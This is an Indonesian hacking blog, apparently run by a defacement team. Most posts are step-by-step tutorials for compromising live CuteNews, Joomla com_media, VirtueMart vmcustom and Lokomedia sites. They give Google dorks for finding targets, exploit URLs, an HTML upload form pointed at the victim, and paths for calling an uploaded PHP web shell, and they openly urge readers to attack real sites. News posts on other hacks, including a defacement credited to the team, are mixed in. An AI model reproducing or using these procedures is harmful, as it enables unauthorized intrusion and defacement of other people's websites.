Selasa, 21 Juni 2016

CuteNews Remote File Upload Vulnerable


   
  ^-^ Assalamualaikum Mas Mba ^-^

Sekarang saya akan share tutorial sederhana ini "CuteNews Remote File Upload Vulnerable"

kenapa sya bilang sederhana krena exploit ini sangat mudah untuk di pahami :D .

Langsung aja baca artikel di bwah ini .

Dork = "powered by cutenews" ( kembangin lgi dorknya yah biar dapat banyak )

Gunakan Dork Diatas Dengan Menggunakan Mesin Pencaharian Google

Klau sudah dapat targetnya , vulnnya kayak gini



Nah disitu ada tulisan register klik disitu , buat mendaftar jadi member :D 

Isi semua kolomnya dengan benar :v . contohnya kyak gini :




Kalau sudah di daftar klik box yg bertuliskan register , nanti klau vuln gambarnya kayak gini .



Klau sudah msuk kayak gini trus ada kolom upload files berarti vuln .

Langsung aja upload shellmu , trus klik box "Save Changes"

Klau berhasil nanti tempat shellnya kyak gini

www.site.com/cutenews/uploads/avatar_mar_namashellmu.php

contoh klau nama shellmu coli.php

www.site.com/cutenews/uploads/avatar_mar_coli.php

Mudahkan :D , Langsung aja praktekin Bos .

^-^ Waasalamualaikum ^-^


Thanks To : Mr.3RR0R | PhantomGhost Team | Sulawesi IT Sec

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Kamis, 09 Juni 2016

Tutorial Deface Dengan Com_Media




      Assalamualaikum mas mbah ^_^

Sekarang lanjut ke tutorial selanjutnya "Tutorial Deface Dengan Com_Media" sebenarnya exploit ini bisa disebut exploit jadul , soalnya ini exploit sudah lama sekali :D .

Tapi exploit nya masih joss kok . masih bnyak yg perawan :D

Langsung aja yah :D .

Dork : "inurl:com_media" (tanpa kutip , kembangin lagi yah itu cuman dork default :) )

Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

   Gunakan dorknya dulu dengan menggunakan mesin pencaharian google :D .





    Pilih salah satu target :D

Klau udah dapat contoh kyak gini .

www.site.com/

   Masukkan exploit yang di atas tadi :D , jadinya nanti kyak gini

www.site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

   Kalau vuln nanti gambarnya kek gini Mas dan Mbah :D





  Tinggal Upload deh file mu :D

Note: file yang bisa diupload berextensi .txt .jpg .gif .png, Untuk html dan php tidak bisa.





Selesai Path Uploadnya Disini > www.site.com/images/file/nama.txt


Gitu aja mudahkan.? , Langsung hjar master dan jgn lupa tetap enjoy :D

Waasalamualaikum ^_^

Thanks To : PhantomGhost - Sulawesi IT Sec

Source Images : https://sulawesi-itsecurity.blogspot.co.id/

Hacker Sejati Meretas Untuk Kesenangan




  Banyak peretas yang menjalankan aksinya untuk merusak sistem sampai mengeruk keuntungan materi. Namun Kaspersky menilai peretas yang menggunakan keahliannya untuk mengeruk uang orang lain bukanlah seorang hacker sejati.

  Dikatakan pihak Kaspersky, hacker atau peretas yang sesungguhnya itu bukan mencari keuntungan. Mereka melakukan aksi peretasan hanya untuk kesenangan pribadi.

  "Hacker yang sebenarnya itu, mereka melakukan hanya untuk kesenangan, bukan untuk mencari kepentingan ekonomi," ujar Territory Channel Manager Kaspersky SEA Indonesia, Dony Koemandarin, ditemui di Ritz Carlton Hotel, Mega Kuningan, Jakarta, Kamis, 26 November 2015.

  Lebih lanjut ia menjelaskan, saat ini banyak peretas bermunculan dan digunakan kemampuannya untuk kejahatan. Itu disebutnya bukan kategori hacker sebenarnya. Hacker, kata dia, melakukan sesuatu didasari‎ karena kesenangan.

  "Berbicara spionase, mata-mata perusahaan, cyber criminal dengan struktur hacker yang teroganisir, itu bukan hacker yang sebenarnya. Dengan di bawah organisasi yang baik, yang ditata dengan rapih cara kerjanya untuk melakukan peretasan‎, itu bukan hacker sesungguhnya," tegasnya.

  Peretas bagi dia itu, seperti kemampuan membobol password, membuat malware yang membuat dia menjadi terkenal, bukan untuk kejahatan dengan tingkat keberlanjutan yang mencari keuntungan semata.

  "‎Kalau ada yang bilang hacker juga manusia, balik lagi siapa yang memegang dia. Kalau direkrut aktivis, dia untuk kesenangan. Hacker itu gak punya tujuan, betul-betul untuk kesenangan. Biasanya, mereka meretas untuk membantu teman-teman dia," ucapnya.


Thanks To : Sulawesi IT Sec

Source : VIVA NEWS & https://sulawesi-itsecurity.blogspot.co.id/

Selasa, 07 Juni 2016

Akun Media Sosial Mark Zuckerberg Dibobol Hacker



       Assalamualaikum ^_^

  Siapa yang tak kenal Mark Zuckerberg , CEO sekaligus pendiri media sosial yang terkenal bernama facebook .

Namun siapa sangka akun Mark Zuckerberg ternyata bisa juga di bobol oleh para hacker .

Seperti yang di lansir Venture Beat , disebutkan bahwa akun CEO facebook ini diretas hacker

media sosial Mark Zuckerberg yang di retas hacker ini adalah twitter dan pinterest

Dibalik semua ini adalah sekumpulan hacker yang menyebut nama teamnya dengan nama "OurMine Team" .

  Bisa dilihat gambar akun media sosial Mark Zuckerberg setelah diretas .






   Masih belum jelas motif hacker ini , ada yang menduga hacker ini sedang menguji sistem keamanan kedua media sosial tersebut .

Senin, 30 Mei 2016

Joomla Plugins VMCOSTUM Arbitrary File Upload





  Assalamualakum Mas Mbah :D

 Sekarang sya akan memberikan Tutorial "Joomla Plugins VMCOSTUM Arbitrary  File Upload"

Sebenarnya sya dapat tutor ini cuman jalan jalan ke blog orang sih :v

Klau gitu langsung aja baca artikel di bwah ini yah mas mbah :D .


  Dork : inurl:/plugins/vmcustom/

Masukkan dork diatas menggunakan mesin pencarian bukan mesin ketik yah :D

klau udah pilih salah satu web masukkan exploitnya kyak di bwah ini

"site.com/path/plugins/vmcustom/photoupload/assets/server/php/"

tanda vulnerable webnya kyak gini mas mbah


Klau Sudah kyak gitu sisa upload shellmu dengan menggunakan csrf di bwah


<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload</font>
<form method="POST" action="TARGET.com/path/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form><br>

Yang berwarna biru ganti dengan web vuln target yg sudah di dapat .

save dengan extensi .html mas mbah :D .

File yg bsa di upload cuman yg berextensi : PHP,HTML,JPG,PNG,JPEG,GIF .

Klau sudah di upload panggil shellnya disini

"www.site.com/tmp/shellberbentukrandom.php"

Atau

"www.site.com/tmp/nx_d5cc371096f4e5516bf0ea7b10707d68/0/Shellmu.php"

   Mudahkan Sisa praktekin dan tetap santai yah :D

Klau Kurang mengerti atau kurang vaham sisa isi kolom komentar yah :D

Exploit Author : AnoaGhost

Source Images : https://shirotenshii.blogspot.co.id/

Thanks To : PhantomGhost - Sulawesi IT Sec

Sabtu, 28 Mei 2016

Situs Institut Pertanian Bogor Diretas



   Kasus peretasan Semakin Merajalela . Kali ini situs Institut Pertanian Bogor yang jadi korban. Peretas yang yang nama teamnya "PhantomGhost" menambahkan file " -.html " di root path domain IPB.




Seperti gambar diatas Ini , Sampai sekarang file tersebut belum dihapus, menandakan celah nya belum ditutup oleh admin web IPB.
Mengenai motif peretasan sendiri kemungkinan hanya sekedar iseng . Terbukti tidak ada pesan khusus di script mereka . Hanya kata kata :


Hacking Not just a name..
Hacking Not a Crime.. Hacking Is ART.

Namun menurut mirror di zone-h.org , tanggal 26 April 2016, situs tersebut juga dibobol oleh peretas dengan kodenama Leohaxor404



Mirror nya bisa dilihat disini :
http://zone-h.org/mirror/id/26313317

LeoHaxor404 berasal dari tim yang sama yaitu PhantomGhost.

Yah semoga saja admin website IPB segera melakukan patching agar tidak ada lagi peretasan yang mungkin lebih parah seperti drop database dll.

Source : http://news.linuxsec.org/

Thanks To : All Member PhantomGhost Dan Sulawesi IT Sec


Bug Upload CMS Lokomedia Vulnerable



    Assalamualaikum ^_^

Lama udah nggak update , gmana kbarnya.? Mudah mudahan baik aja yah , Klau sakit pergi saja dulu bobo entar mati Siapa yg tanggung jwab :v .

Sekarang sya akan membagikan Tutor "Bug Upload CMS Lokomedia Vulnerable" Kepada para mastah :v Tapi Perhatikan Dengan Baik , Karena Bug Nya Agak Rumit -_- . 

Klau gitu langsung aja baca artikel di bwah :D .

Dork : allinurl:media.php?module=berita

Gunakan Dork diatas dengan menggunakan mesin pencarian :D .

Kemudian pilih salah satu target yg mau di hajar :v .

klau sudah dapat masuk dulu di halaman loginnya mas mbah .

biasanya halaman loginnya kyak gini : 

www.site.com/administrator/

atau 

www.site.com/adminweb/

atau

www.site.com/admin/

Klau udah msuk di halaman loginnya masukkan url ini "modul/mod_banner.php"

Contoh kyak gini nih

www.site.com/admin/modul/mod_banner.php





Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :


nanti ada di source code tersebut kyak gini ".aksi.php?module=banner&act=input"

Masukkan Source Code yg di atas di belakang url target kyak gini

www.site.com/admin/aksi.php?module=banner&act=input

Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki.

Klau mau lihat hasil upload shellnya disini mas mbah :D

www.site.com/admin/foto_berita/namashell.php

Mudahkan.? Sisa di praktekin nih mastah , dan jangan lupa Enjoy

Kalau Ada Kurang Vaham Atau Belum mengerti Isi Aja Kolom komentar , Atau Bisa Kunjungi Fanspage Kami "https://mobile.facebook.com/Mr3RR0R-1605930586394122/".

Waasalamualaikum ^_^



Thanks To : All Member PhantomGhost Dan Sulawesi IT Sec